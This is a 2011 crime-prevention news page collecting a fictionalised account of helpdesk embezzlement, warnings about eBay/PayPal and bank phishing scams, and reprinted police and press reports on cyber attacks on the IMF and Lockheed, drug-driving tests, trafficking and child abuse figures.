So treat this article as a kind of a warning. Be aware of what you are doing and what your surroundings are. Just because you have done something at home or in another country doesn't necessarily mean it is acceptable where you are now, regardless of how innocent those actions are.

(18th July 2011)


 

IT'S A HOLD-UP

If you are thinking about outsourcing any of your background functions to another organisation you may want to consider some of the pitfalls raised in this story first.

The story is true, but the names of the organisations involved have been changed. Traditionally, along the lines of other stories the names have been changed to protect the innocent. If any name changes match reality that is purely coincidental.

This article describes a multi-national peg manufacturing company called "Holdem Peg Co Ltd". It manufactures and sells pegs all over the world, from the basic wooden peg to their premium stainless steel pegs with soft hold springs. The company sells its products to wholesalers and sometimes directly to large retailers. One of the company's major selling points is its pre-sales support. Any questions that a customer or retailer has about one of its products could be answered by a call to one of its regional helplines. The company operates its helplines on a regional basis; i.e. North America, Asia and the Pacific rim, Africa and the Middle-East, Europe etc. The Advisers in each of the centres speak the language of the region that they cover.

To enable the Advisers to answer questions on the product range they work with a computer driven script (a Customer Service System - CSS) that eventually comes up with the solution to the question. Larger retailers are provided with a similar computer solution that helps their customers to decide on what product to purchase. The regional helpdesks also offer support on the working of that system if a problem is encountered.

As with most companies worldwide, Holdem was always looking out on how it could save money. As always the most money could be saved by reducing its staffing overhead. Therefore, one of the areas where it decided to make changes was with its Helpdesks. The company that won its worldwide tender was "Goodcall Inc". This company was chosen for two reasons: its international presence and its ability to also deal with future software development to the CSS.

One of Goodcall's ways of reducing costs was to only staff each of its helpdesk centres with adequate levels to answer the average number of calls received during a normal week and that could be answered in under 3 minutes. On that basis, their client (Holdem) would be charged for a basic package (includes 3200 calls) on a monthly basis. If Holdem held a marketing drive (extra Newspaper and TV advertising) they should give Goodcall Inc 4 weeks' notice so that they could hire and train more agency staff to be able to deal with the extra calls within the required time. The cost to the client (Holdem) in this case would be based on a set fee for the first 600 extra calls and then another fee on top for every additional 50 calls on top of that. As you can see, we are starting to get into a scenario where you would need a degree in accountancy to work the figures out, but Holdem was happy with the suggested concept.

Goodcall Inc based its helpdesk for the whole of Europe in the North of England, whilst their client liaison team was based at the Holdem's European HQ in the South of England.

So there we have it, Holdem was saving money, Goodcall was apparently offering a good service and was making a profit. But things were not quite as simple as it first appears.

Two years after the Goodcall service commenced one of their customer liaison team became ill and needed to be replaced. The replacement team member (Fred) realised that there were some problems and put some remedial processes in place to cure the problem. Fred also started to make monthly visits to the Helpdesk, something that hadn't been done before. This had normally been left to the Senior Liaison Manager (Julian). Based on Fred's visits further improvements were made to the Advisers' environment and the CSS at minimal cost, but the results were major efficiencies in the Helpdesk service. As previously mentioned, the costing arrangements were very complex, so another team member (John) was brought in to design a spreadsheet tool that would do all of the number crunching.
 
John remained on the team for about a year and his costing model seemed to do the trick. Every time the client warned of a marketing drive the model came up with a reasonable estimate of the cost. Holdem was happy with how close the estimate was to the final cost.

In Fred's second year on the team he started to notice his manager's extravagant entertainment of the client's representatives. This included fancy meals, overnight drinking sessions and stay overs. Fred was invited to one overnight soirée where drugs were also provided. The only thing was that the available budget to pay for such events was not adequate, but they continued.

When John left the liaison team Fred was made responsible for the costing spreadsheet. It came with basic instructions, but Fred wanted to know how it worked. Based on all the logic of the spreadsheet's mathematical equations the thing should not have worked. So Fred called on an acquaintance in the Goodcall finance team to make further checks. They came to the same conclusion, but with a commentary on how the spreadsheet model worked. You had to enter the answer in the spreadsheet for it to provide a result. The whole thing was "smoke and mirrors" to dupe Holdem representatives. That is why the estimates were always so near to the final cost !

Fred also discovered another strange anomaly; and this was to do with the staffing levels on the Helpdesk in the Northern office. The responsibility of dealing (contracts etc) with the recruitment company was solely in the hands of Julian, as was the quarterly payment of their invoices. The recruitment agency was based in the North and specialised in multi-lingual workers. Julian also made visits to the Helpdesk on a quarterly basis which coincided with these invoice payments.

As for the staffing anomaly: Goodcall's contract with its client was to increase the number of agency staff on the helpdesk during times of high demand (marketing drives). Typically, according to calculations these required an additional eight staff to be hired. On two occasions over the course of a year Fred managed to visit the Helpdesk during these marketing drives, but noticed that only four additional staff had been taken on. On checking the annual finance reports Fred discovered that Goodcall had been paying for the four additional "phantom staff" at a cost of £100,000 per year.

One of the strange management arrangements of Goodcall was that they had no reasonably sized finance department to scrutinise their client accounts. They only investigated an account if it was making a loss or inadequate profit. The Holdem account was making a profit !

Fred raised the issue of the excessive entertainment and "phantom staff" directly with Goodcall's Finance Director. Based on the suspicions an accountancy investigation team was put in place. They discovered that over 4 years £500,000 had been embezzled by the original customer liaison team, which included some of Goodcall's senior departmental managers. The parties that were held were to keep the Holdem representatives "sweet" and they also received a financial inducement to report positively on how the Goodcall operation was working. Julian had made an agreement with the recruitment agency to make a split of the profits of the "phantom staff", hence his quarterly visits to the helpdesk. This was also cover for him making visits to the recruitment agency for his and his associates' part of the takings.

The end result was that Fred was moved to another client account. Julian and the other members of the Goodcall customer liaison team were dismissed along with the off site senior managers. Holdem also dismissed its representatives who were receiving the inducement. A delegation from both of the companies' boards held a meeting in secret where they agreed not to make details of the crime public for fear of the effect it would have on their shares. Finally the contract was terminated and Holdem went back to managing its own helpdesk.

As for John of the dodgy spreadsheet, he still works for Goodcall !

(18th July 2011)




MOBILE PHONE SAFETY

 

We have all heard in the news the latest scares on mobile safety, but few articles seek to provide any advice to us personally. So from the land of litigation where everybody is allowed to make an educated choice, here is an article that provides some more information on how much radiation comes from a specific telephone. The USA also has a legal limit on the amount of radiation that can be emitted from mobiles sold there.

Caveat to article

The research quoted in the following article was carried out in the USA. So the power levels quoted for each of the mobile phones on their database may not be the power levels transmitted by the same mobile within the UK.

An analogy is the motor industry. Vehicles manufactured outside of the USA and imported in have to be modified to comply with their emission requirements. Those modifications also affect the vehicle's power output. Conversely, outside of city centres in the USA, the mobile phone transmission / reception cells (or distance between aerials) is much greater than in the UK. So the mobile phones may need to be more powerful.

The following link takes you to an article that includes a search facility of a database of mobile phone radiation levels. In the USA, the maximum permitted radiation level is 1.6 Watts / kilo (human body mass).
 

WHAT'S YOUR CELL PHONE'S MAXIMUM RADIATION LEVEL
(Computerworld, dated 3rd June 2011 author Sharon Machliss)

With recent news of a possible link between cell phone radiation and risk of brain cancer, you may have a new-found interest in knowing how much radiation your mobile handset is giving off -- or, more importantly, how much your body might be absorbing.
www.computerworld.com/s/article/9217287  [Note 1]

(20th June 2011)


 



FRAUD VARIATION

We keep on hearing how fraudsters hit people for money by phishing via e-mail, but what about this: they are also hitting people selling goods on eBay !

This is the scenario: a genuine seller places a UK Blackberry mobile phone with a UK SIM on eBay. They place the item for sale for 10 days and they set the reserve. After a couple of days the bids reach £40, then out of the blue a bid is placed for £140 + p&p from a reliable bidder in Canada, but via the eBay messaging system (time 5.56am). The eBay message asked for the vendor's PayPal public e-mail address. The vendor then receives another e-mail to his PayPal public e-mail address (time 11.14am) from PayPal; this included the company logos and what appeared to be in the main standard PayPal text :

"This is a confirmation email of a payment of £155.00 GBP received from #########. What we required from you in order to get your account credited is the item's shipping tracking/reference number, this number will be given to you at the courier office after you might have sent the item to the bearer, this is part of our new policy and a security measure in other to protect both the buyer and the seller, also to verify if the item was really bought from you we have sent you a confirmation email earlier on to inform you that the payment is legal and has been confirmed, also to guide you against fraudulent acts."

Another message was then received on the vendor's PayPal public e-mail (time 5.15pm) where the buyer states that they have paid the required amount via PayPal and then asks the vendor to post the mobile to an address in "Nigeria". So we have an eBay buyer from Canada, purchasing a mobile with a UK SIM, wanting their purchase to be sent to Nigeria ?

So, if the PayPal e-mail states that the agreed purchase price has been paid into the vendor's account, then the PayPal online account should also show the credit. It didn't !

It appears that the fraudster had hijacked the bona fide purchaser's account (someone who had been a member since 2003 and had a 100% reliability record). They then contacted vendors to make purchases and then followed up with a "bogus PayPal" confirmation of payment e-mail. This was then followed with another e-mail stating the delivery address, which in this case did not line up with the true PayPal account holder's recorded location. Remember, PayPal will inform vendors of completed financial transactions via their Private PayPal e-mail address. In this fraudulent example, they didn't.

These fraudsters were tracking how the fraud was going from the opening to closing statement, about 12 hours from start to finish. It was almost a project management exercise, so how many other simultaneous fiddles were going on ?

So how was the Canadian's eBay account hijacked ? Well they probably received an e-mail from a "bogus eBay" stating that their account had been compromised; and that by clicking on the convenient attached link they will be taken to an area of the eBay website where their security details (username, passwords etc) can be entered and checked.

The vendor in this example of a true incident was vigilant, looked at the clues, then checked to see if the payment had actually been received.

As with all phishing attacks, check all transactions and warnings directly with the organisation where it is claimed there is a problem. Do not use the links that you are being directed to use.

If you have experienced this fraud, but are not financially disadvantaged, advise eBay of the situation. By doing so, the hacked account can have its security restored or be shut down.

If you have experienced this fraud and have been financially disadvantaged (lost money and/or property ), advise eBay of the situation. In addition, report the crime to Action Fraud ( telephone 0300 123 2040 ) or via their website : www.actionfraud.org.uk

(20th June 2011)


 

MET COMPLETES SAFER NEIGHBOURHOODS REVIEW
(Courtesy of Metropolitan Police, dated 9th June 2011)
www.met.police.uk

The MPS remains committed to neighbourhood policing following an extensive review and is to recommend that every local community will retain its dedicated Safer Neighbourhoods team, comprising at least two constables and three police community support officers.

Under our proposals, which are due to be debated at the Metropolitan Police Authority next week, 16 June, Safer Neighbourhoods Teams, which were introduced in 2006, will continue to be aligned to political ward boundaries, and will remain responsible for addressing local crime and safety concerns. They will also remain under the operational control of the borough commander.

There will be no reduction in the number of PCs and PCSOs within Safer Neighbourhoods Teams so every ward will retain a dedicated team of at least two PCs and three PCSOs. Boroughs that currently have enhanced teams with six PCSOs will also retain these staff.

However, changes are being proposed that will, on occasion, see Safer Neighbourhood resources used more flexibly to support other wards in the borough. During these periods of temporary deployment to other areas, wards that are supporting their neighbours will still retain a minimum strength of one PC and one PCSO from its dedicated team to make sure there is still a permanent uniformed presence in every ward.

Another key proposal is to make reducing crime and anti-social behaviour explicit objectives of Safer Neighbourhoods activity in addition to the priorities of the community, which are through ward panels. In addition there are proposed changes to supervisory roles where sergeants may be responsible for more than one team.

Assistant Commissioner Ian McPherson, head of Territorial Policing said: "I'm delighted to announce the MPS remains committed to neighbourhood policing. This means that under our proposals every ward in London will continue to have its own Safer Neighbourhoods team working with and for local people."

"We intend for our Safer Neighbourhoods teams, which have become familiar sights in local communities, to continue to do the things they have always done by supporting local communities and helping address their crime or safety concerns. And we propose to keep each team with at least two PCs and three PCSOs, which we intend to protect from any reductions.

"Borough commanders will retain operational control of their SN teams and ensure they are being used in the right way to work with local people to help keep communities safe. I'm pleased to reaffirm the Met's strong commitment to community policing."

Proposals from the review of Safer Neighbourhoods are due to be discussed at the MPA Strategic and Operational Policing committee on 16 June: http://www.mpa.gov.uk/

(13th June 2011)


 

MORE NEWS FROM MY SPAM INBOX !
Category : phishing
 
My Internet Service Provider's (ISP) spam filter has again done a very good job. From mid May until now it has managed to filter out 4 phishing e-mails and place them in a "be warned" post box. The latest batch of phishing e-mails include :

Lloyds TSB (2) - Several attempts have been made to access your account, your account has been de-activated. Please supply your security information to re-activate.

New for the year :

Facebook - It appears that your accounts security has been compromised. Please access your account ( by the convenient "bogus" link ).

Northern Rock - We notices that your account may have been accessed by an unauthorized third party. Protecting the security of your account is our prime concern. Therefore, as a temporary measure, we have limited access to sensitive account features. To restore your account access, we need you to confirm your identity. Please access your account ( by the convenient "bogus" link ).

All of these e-mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within these bogus e-mails.

(13th June 2011)


 

IMF HIT BY VERY MAJOR CYBER SECURITY ATTACK
(BBC News, dated 12th June 2011)
www.bbc.co.uk

The International Monetary Fund (IMF) says it has been targeted by a sophisticated cyber attack.

Officials at the fund gave few details but said the attack earlier this year had been "a very major breach" of its systems, the New York Times reports.

Cyber security officials said the hack was designed to install software to create a "digital insider presence".

The IMF, which holds sensitive economic data about many countries, said its operations were fully functional.

The cyber attack took place over several months, and happened before former IMF chief Dominique Strauss-Kahn was arrested over sexual assault charges.

"I can confirm that we are investigating an incident," said spokesman David Hawley. "I am not in a position to elaborate further on the extent of the cyber security incident."

The New York Times said IMF staff had been told of the intrusion on Wednesday by e-mail, but that the Fund had not made a public announcement. The e-mail warned that "suspicious file transfers" had been detected and that an investigation had shown a desktop at the Fund had been "compromised and used to access some Fund systems".

There was "no reason to believe that any personal information was sought for fraud purposes," it said.

High profile breaches
 
A cyber security expert told Reuters the infiltration had been a targeted attack which installed software designed to give a nation state a "digital insider presence" at the IMF.

"The code was developed and released for this purpose," said Tom Kellerman, who has worked for the Fund.

Bloomberg quoted an unnamed security expert as saying the hackers were connected to a foreign government. However, such attacks are very difficult to trace.

The World Bank said it briefly cut its network connection with the Fund out of "an abundance of caution".

"The World Bank Group, like any other large organisation, is increasingly aware of potential threats to the security of our information system and we are constantly working to improve our defences," said spokesman Rich Mills.

The incident is the latest in a string of high-profile cyber security breaches.

In April, the Sony Playstation network was shut down after hackers stole the personal data of about 100 million accounts and in May, US defence firm Lockheed Martin said it had come under a significant cyber-attack.

CIA Director Leon Panetta told the US Congress earlier this week that a large-scale cyber attack which would cripple power, finance, security and governmental systems was "a real possibility in today's world".

Analysis
(Rory Cellan-Jones, Technology correspondent BBC News)

The IMF is saying very little, beyond confirming that an incident has taken place, but on the face of it this looks like a serious attack on computer systems holding some very sensitive data.

The fact that the FBI has been called in, and that the neighbouring World Bank has severed its computer link to the IMF, show that it is being taken seriously.

An internal memo suggests that one particular desktop has been compromised - and security experts are speculating that an individual has been targeted with an email containing malware.

That could have enabled the attacker to gain access to the IMF's systems. What is not clear is whether any data was lost.

For an organisation already in crisis as it looks for a successor to Dominique Strauss-Kahn, the cyber-attack is yet another challenge. The IMF's members will be urgently seeking assurance that their data is secure and that the fund's defences are in good order.

(12th June 2011)


 

MET TARGETS CRIME IN HUGE CRACKDOWN
(Courtesy of Metropolitan Police, dated 8th June 2011)
www.met.police.uk

A major new crackdown by the Metropolitan Police Service against robbers, burglars and violent criminals has begun today.

Operation Target, which is one of the most significant initiatives of its kind ever conducted by the MPS, is a renewed drive to tackle crime against people and property in London leading to significant, long term reductions.

As at 15:00hrs, on 8 June 2011 there have been:

- 163 operations across London

- 38 arrests on suspicion of offences including possession of firearms, burglary, supply of drugs, public order and theft. Three sawn off shotguns and a revolver recovered.

- 100 mobile phones found at one address.

- 70 to 100 cannabis plants found in a south London borough.

The sustained campaign, which kicks off today with a series of operational activities, increased patrols and enforcements, brings together all the Met's specialist resources, skills and people to support local police tackle crime and anti-social behaviour, allowing the public to go about their daily lives feeling more confident and safe.

Specialist MPS teams, such as the Flying Squad, Traffic and Mounted Branch will be supporting borough policing units to deliver the operation. Covert and overt tactics, and intelligence-led interventions will be used. Specialist investigation teams will help trace and arrest wanted or suspected robbers and burglars, while increased presence on the streets will be achieved through extra uniformed patrols at key areas.

Analysis shows the initial 'Target' areas, while geographically making up just 2% of London, constitute around nearly a third of all London's street robberies and most serious violence; 15% of residential burglaries and 20% of non-res burglaries.

As well as achieving immediate crime reductions, the operation intends to embed a number of effective long term crime prevention strategies to ensure there is sustained crime reduction in these areas. The overall result will be an improvement in public confidence and feelings of safety in the targeted areas.

Assistant Commissioner Ian McPherson, head of Territorial Policing for the MPS said: "The MPS is here for London, and to help keep communities safe we are enhancing our efforts to tackle crimes against people and property.

"Operation Target is to be the largest and sustained crackdown against crimes such as robbery, burglary and violence ever conducted by the MPS. While robbery and burglary are still relatively low in comparison to previous years we are determined to cut these offences further.

"The public can support this operation and help themselves from becoming a victim of crime by taking some basic prevention measures.

"By bringing together borough based knowledge and expertise with the skills of our specialist units we will make a real and sustainable difference, allowing people to go about their daily lives feeling more confident and safe."

The officer leading Operation Target, Commander Maxine de Brunner added: "Target is a long-term drive to reduce crime and keep it down. The operation is due to last for at least six months and will see the relentless deployment of our specialist assets, resources, tactics and skills in areas which suffer disproportionate levels of crime and anti-social behaviour."

The Mayor of London, Boris Johnson said: "We're cracking down on the perilous criminality that can devastate people's everyday lives and there is no room for complacency. Burglars, robbers and drug dealers should take heed as their crime funded life styles may soon be ending. I've seen first hand today the immense hard work that goes into carrying out policing operations and I have every confidence that Target will be a complete success. The raids this morning will have an immediate effect on the hundreds of local residents who have been living under a cloud of fear."

The public can find out more and get crime prevention advice by contacting their local Safer Neighbourhood Team.

Targeted boroughs ( Information from www.bbc.co.uk )

Havering
Barking and Dagenham
Newham
Greenwich
Tower Hamlets
Lewisham
Southwark
Lambeth
Croydon
Kingston
Hammersmith and Fulham
Southall
Westminster
Brent
Camden
Enfield
Haringey
Waltham Forest

(12th June 2011)


 

CITY POLICE USED IN ADVANCED-FEE FRAUD WARNING
(City of London Police, dated 7th June 2011)
www.cityoflondon.police.uk

City of London Police is reminding the public of the dangers of advanced-fee fraud. The message comes after officers learnt fraudsters have used the force's name to suggest that a lottery scam was legitimate. An email claiming to be from 'Constable John Bruce' 'guaranteed' the competition, and asked for the recipient to confirm their contact details. Detectives believe the fraudster's next step would be to ask for an admin fee to process the prize.

An outdated City of London Police logo and address are used in a bid to make the e-mail seem genuine.

Det Supt Crampton, from the City of London Police Economic Crime Unit, said: "The City of London Police does not endorse lotteries or similar initiatives and would not engage in facilitating distribution of such 'prizes'. Should such correspondence be received treat with extreme caution and forward to the National Fraud Desk for our attention".

If you have received similar emails then please forward them to City of London Police at nfd@cityoflondon.pnn.police.uk.


If you have responded to such correspondence received, have lost money or believe yourself to be a victim of an advance fee fraud then please contact Action Fraud on 0300 123 2040.


NFIB Advice

• Treat unsolicited communication (e-mail, phone & letters) that offer financial gain with extreme suspicion

• Lotteries should not ask for a fee to release your winnings

• Never pay an advance fee

• Do not provide any banking details

• Contact the organisation named using independently sourced contact details, not the details they have supplied to you

• Fraudsters will impersonate large organisations such as banks, government departments or the police in an attempt to give credibility to their scam

(12th June 2011)


 

NEW POLICE DEVICE TO CATCH DRIVERS ON DRUGS
(The Sunday Times, dated 5th June 2011 author Dominic Tobin)
www.thesundaytimes.co.uk  [Note 1]

The new 'drugalyser' devices use improved technology and can detect even low levels of drugs in saliva

The first "drugalysers" are expected to be approved for use in police stations by the end of this month, signalling a new crackdown on drivers who take drugs.

The handheld machines, currently being reviewed by the Home Office, will be able to detect a range of substances including amphetamines, cannabis, cocaine, crack, methadone, ecstasy, crystal meth and opiates such as heroin.

Improved technology means that testing devices can now detect even low levels of drugs in saliva. One of the machines under review by the Home Office is the DDS made by Concateno, an Oxfordshire-based company that already supplies devices to police in Italy and Australia.

The machine analyses saliva from a swab that has been rolled around the gum, tongue and inside cheek of a suspect. This is mixed with a fluid and tested on the machine. The result, which flashes up on an LCD screen, is sufficient to justify a mandatory blood or urine test.

If approved, the devices could be in use in police stations by the end of this year. Roadside use by police patrols is likely to follow after further approval, substantially increasing the numbers of prosecutions.

Mike Penning, the road safety minister, said: "Drug-drivers put the lives of responsible motorists at risk and we are determined to ensure the police have everything they need to tackle this menace. We have taken urgent action and intend drug-screening devices to be available for use in police stations this year, making it easier for offenders to be brought to justice."

At present, motorists stopped by police on suspicion of driving under the influence of drink or drugs are first breathalysed for alcohol. If this proves negative, the driver may be taken through an "impairment test" involving tasks such as standing on one leg, walking in a straight line or touching their own nose.

A driver suspected of being impaired through drugs will be taken to the police station and a doctor will be called to give a medical opinion on the cause before a blood or urine sample is taken. The drugalyser cuts out the need for a doctor because it provides sufficient preliminary evidence that the driver is impaired through drugs. Each drugalyser test costs about £15.

In 2008 there were 253 prosecutions for drug-driving in Britain, compared with 73,000 for drink-driving, but the relatively small number of drug-related prosecutions is thought not to reflect the extent of the problem. A European Union study in 2005 suggested that almost 11% of 1,300 drivers stopped in Glasgow were drug users.

The government is considering new legislation imposing limits on drug levels that would eliminate the need for police to prove impairment. Alcohol is the only drug for which there is a legal blood limit.

"We are also considering a new offence of driving with specified drugs in your system but this is a complex medical area and requires detailed examination," said a spokesman.

One problem for ministers in drafting a law is deciding what levels of drugs in the blood cause impairment and how to set legal limits. To do so in the case of prohibited substances would imply that there is an acceptable level of use. On the other hand, imposing zero tolerance, with no traces of drugs permitted, could mean innocent people getting caught up in the ban through accidental intake or because of confusion with prescription drugs.

"Setting a level at which a drug can affect driving is difficult and that is why countries such as Sweden have zero tolerance," said Mike Scott-Ham, principal scientist at the Forensic Science Service (FSS), which carries out about 3,000 blood tests a year on motorists.

The FSS uses gas chromatography mass spectrometry to separate and identify the chemicals in blood. Scientists look for unique ingredients that make up each one to try to avoid as far as possible confusing them with legal medicines. THC, the active ingredient in cannabis, indicates use of the drug. Monoacetylmorphine indicates recent use of heroin; it is formed as the drug breaks down. Benzoylecgonine is created as the body breaks down cocaine.

(7th June 2011)


 

TEXT ALERT ! YOUR TOAST IS ON FIRE :(
(The Sunday Times, dated 5th June 2011 author Matt Bingham)
www.thesundaytimes.co.uk  [Note 1]

This smoke alarm doesn't simply let off an ear-splitting shriek when you burn the toast - it also sends a text message alert to up to four separate numbers. It's a feature that to date has only been available on alarms offered as part of home security systems costing hundreds of pounds. The Firetext is both cheaper and, being battery operated, doesn't have to be wired to the mains, so doesn't run the risk of failing should a fire knock out the supply.

The texts are sent using a Sim card built into the device (it's pay-as-you-go but needs a £10 minimum top-up; texts cost 4p each). During setup you can specify four mobile phone numbers, located anywhere in the world, that will receive an alert should the alarm be activated.

The system could bring peace of mind, not just for homeowners worried about leaving their premises empty, but for anyone with elderly, infirm or hard-of-hearing relatives who might not hear or react to the alarm. In an ideal world, one of the numbers would be for a message alert system with the nearest fire brigade; the device is currently being tested with Hertfordshire fire and rescue services for just such a tie-up.

The Firetext, which was developed with the help of a £50,000 prize awarded last year by Barclays Bank in a competition to find innovative new enterprises, takes a standard 9V lithium battery - enough for at least 36 activations, or a life of between two and four years. The device is currently only available to buy online, with post and packing to any UK address costing an additional £5.

Unit cost : £89
Company website : http://firetext.me  [Note 1]

Disclaimer

The uware.org.uk website does not endorse this product or the company mentioned in this article. The product appears to be useful and includes an innovative idea, but any potential purchaser should check to see if it will meet their requirements. These checks should include whether there have been any endorsements from UK Fire Services. As of today's date, the Firetext website does not appear to declare whether their product meets BSI requirements (no kitemark).

Important

A perfectly adequate smoke alarm which meets BSI requirements costs less than a McDonald's meal or 4 bottles of Cola. Once you get one, follow the manufacturer's guidance on regularly testing it and remember the batteries normally don't last forever !

(7th June 2011)


 


CYBERCRIME COMPLACENCY NO LAUGHING MATTER
(The Guardian, dated 1st June 2011 author Nick Hopkins)
www.guardian.co.uk   [Note 1]

Scotland Yard launches 'cyber flying squad' as British public warned to be more alert to online criminality.

The British public needs to snap out of its complacency about cybercrime or risk becoming victim to increasingly sophisticated criminal networks that are operating online, the head of the country's e-crime unit has warned.

Janet Williams, who takes the lead on cybercrime at the Association of Chief Police Officers, said people seemed to think that being technophobic was quaint and slightly comical.

She was drumming into her detectives that this was no longer acceptable and that the public needed to change its way of thinking too, she said.

"What worries me is that people still think of cybercrime and cyber-attacks as being a little bit like maths. If you go to a dinner party, someone might say that they don't really get maths and everyone laughs and titters. Not being able to understand it is the equivalent of not being able to read.

"It is unacceptable now and on that basis I have been saying to detectives that if they don't understand what is happening with cybercrime then they shouldn't be a detective. I really mean that."

Williams added: "Most of my working life has been in CID and counter-terrorism. I don't think that in the future detectives will be equipped to be able to deal with these things if they don't understand the nature of cybercrime and I think that multinational organisations, public and private organisations, need to ensure that they understand the threats to their organisation."

Asked whether she thought the public also needed to make more effort to understand the dangers, she replied: "Absolutely."

Williams, one of the most senior officers at Scotland Yard, said business leaders should be ensuring that their firms were properly protected against the theft of valuable intellectual property. "Chief executive officers need to be personally reassured the controls and protections are in place. Intellectual property rights are very important to the UK."

She said she was particularly concerned that industry and universities had not completely understood the new landscape. "[They] need to think it through. I don't think there is sufficient appreciation of the risks," she said.

Williams has set up a "cyber flying squad" based at Scotland Yard, and said her team of 35 detectives and specialists were having significant success.

But she conceded that she needed the help of some of the biggest multinational corporations. Most had sophisticated cyber defences and the ability to track criminals around the world. In many cases, she said, "their intelligence systems are better than ours".

Williams has asked the Home Office to consider pressing for changes to the system of commission rogatoires - the letters of request for legal or judicial assistance sent by one country to another.

With online criminals able to move across borders in the blink of an eye, police have found that the traditional ways of seeking assistance from other countries are outdated.

"We have made recommendations to the Home Office," Williams said. "We have outlined the nature of the problem. But it is up to them to find a solution."

During last week's visit by the US president, Barack Obama, the UK ratified the Budapest convention on cybercrime, which should speed up investigations in some European countries and the US.

Reliable figures about the scale of crime online are difficult to assess, but GCHQ, the government communications headquarters at Cheltenham, estimates that "a figure well into billions" is credible.

One study earlier this year estimated that cybercrime costs the UK more than £27bn a year.

Police know of hundreds of hacking forums, on which thousands of stolen UK credit card details are available for sale for as little as £1.50.

Whitehall officials said that there was a "noticeable spike" in the use of such forums on Friday and Saturday nights, possibly because people returning home from an evening out might have their guard down and were surfing sites they would otherwise ignore.

(2nd June 2011)


 

FREEPHONE FOR TRAFFICKING VICTIMS
(BBC News, dated 1st June 2011)
www.bbc.co.uk

A free phone line for the victims of human trafficking has been launched.

The Metropolitan Police Service wants people who have been brought to the UK and forced to work for little or no wages to report the crimes.

The number is featured in a poster campaign produced for the force and the charity Stop The Traffik.

The force's SCD9 unit, which fights human exploitation, has secured 12 convictions in 12 months and a further 20 people are awaiting trial.

Det Ch Supt Richard Martin, head of SCD9, said: "I hope that this poster and the freephone number it shows will encourage and enable victims who are suffering at the hands of traffickers to get in touch with us.

"Since SCD9 was formed in April last year, we have been working to raise awareness and understanding of all aspects of human trafficking, including trafficking for sexual exploitation and trafficking in the context of domestic servitude and forced labour."

Freephone Number : 0800 783 2589

(2nd June 2011)



NSPCC SAYS CHILD SEX ABUSE HAS RISEN TO 64 CRIMES A DAY
(BBC News, dated 26th May 2011)
www.bbc.co.uk

 

At least 64 children are sexually abused every day in England and Wales, figures obtained by the NSPCC suggest.

More than 23,000 offences - including rape, incest and gross indecency - were recorded by police in 2009-10, an 8% increase on 2008-9, the charity said.

For the first time, its research also looked at the age of abusers and found a quarter were aged under 18. One in four victims was aged 11 or under.

The Home Office said the figures were "appalling".

The figures for recorded sex crimes against children were obtained through a successful NSPCC freedom of information request to all 43 police forces in England and Wales.

The figures showed that more than half of the victims were aged between 12 and 15, one in four was aged five to 11, and more than 1,000 were aged four or younger.

Girls were more than six times more likely to be assaulted than boys, with 86% of attacks taking place against females, the figures showed.

The police force reporting the largest number of crimes was London's Metropolitan (3,672), followed by West Midlands (1,531) and West Yorkshire (1,205).

Jon Brown, who heads the NSPCC's work on child sex abuse, said the increase was a "real concern".

"Thousands of people come forward every year to report sex crimes against children. But many victims are too young to ask for help. Others are too scared to tell anyone about their suffering until years later," he said.

"More than 2,000 suspects in these cases were under 18. It's clear we need more services that address the harmful sexual behaviour of young people, as well as adult offenders."

'Dark places'
 
The Association of Chief Police Officers (Acpo) warned that recorded crime figures were "not a good indicator of the prevalence or trends of child sexual abuse" as much abuse went unreported and rises could be attributable to victims of historic abuse coming forward.

However, Assistant Chief Constable Peter Davies, the Acpo lead for child protection and child abuse investigation, said: "Understanding the crime though is central to success.

"We are starting to bring it out of the dark places where victims suffer in silence for fear of reporting while recent infiltration of intricate global paedophile networks is further testament to the work we have collectively done to understand how offenders think and operate."

A Home Office spokesman said the government would continue to work with groups like the NSPCC to protect the most vulnerable people in our society.

It pointed to the roll-out of the child sex offender disclosure scheme across police forces in England and Wales earlier this year.

This allows parents to check whether someone in contact with their child is a convicted sex offender.

Dubbed "Sarah's Law", it was proposed after the murder of eight-year-old Sarah Payne by a convicted sex offender, Roy Whiting, in West Sussex in 2000.

The Home Office said this was a "major step forward in our ability to protect children from sex offenders".

National Society for the Prevention of Cruelty to Children : www.nspcc.org.uk

Barnardo's : www.barnardos.org.uk

(1st June 2011)



METROPOLITAN POLICE LOOK AT CLOSING STATION FRONT DESKS
(BBC News, dated 30th May 2011)
www.bbc.co.uk

 

The Metropolitan Police is considering closing down some of London's 138 front counters - the first port of call in most police stations - in an attempt to save money.

It is proposing a minimum of one front counter per borough, staffed 24-hours-a-day, seven days a week.

But critics say reducing the number of front counters would make it more difficult for people to report crime. No decisions will be made until a public consultation is completed.

The Met is reviewing the use of front counters as part of a wider analysis into how the public contact the police - whether face-to-face or using telephone and online methods.

It says there has been a reduction in the reporting of crime via front counters.

According to the Met last year approximately 14% of crimes were reported in this way, while 66% were by phone.

'Place of safety'
 
Commander Tony Eastaugh said: "Some of our front counters hark back to a different era.

"We now have 630 Safer Neighbourhood Teams, we have surgeries, we have different mechanisms for engagement of police at a local level."

But critics fear it is a cost-cutting exercise which will remove a valuable resource from communities.

Richard Moore, chairman of a Safer Neighbourhood Panel in Lambeth, said: "The first purpose of any police station is to be a place of safety.

"That blue lamp is recognised throughout the world and if somebody's in trouble that is where they're going to want to go.

"They do not want to find a police station is closed and it's only open part time."

But Liberal Democrat London Assembly member Caroline Pidgeon said: "Evidence has shown members from black and minority ethnic communities and older people who like to go and report things in person.

"If there's only one front counter in every borough they won't be able to get there and I fear lots of crimes won't be reported."

The Met is running an online survey into the way people access the police until midnight on 30 May but a wider public consultation will continue into the summer.

No decisions about changes to the number of front counters will be taken until this is completed.

(1st June 2011)




HACKERS BEAT LOCKHEED DEFENCES
(Sunday Times - Business, dated 29th May 2011 author Karl West)
www.thetimes.co.uk  [Note 1] 

Hackers have penetrated the security networks of the world's biggest defence company, Lockheed Martin, sparking fears that other groups' systems may have been breached.

The intruders are thought to have created duplicates of electronic keys made by an American technology group, EMC Corporation. Its security division, RSA, was hit by a sophisticated attack in March.

RSA's electronic keys enable company employees to log into their computer network securely when they are out of the office. Its technology is used by most Fortune 500 companies and federal agencies in America. The website also cites case studies from Rolls-Royce and Bentley cars, Staffordshire police, the French ministry of education, Virgin Blue, the airline, and the Bedfordshire and Luton fire and rescue service.

Lockheed produces some of the most advanced military hardware in the world, including the F-35 Joint Strike Fighter and F-22 Raptor, and is a significant contractor on America's nuclear weapons programme.

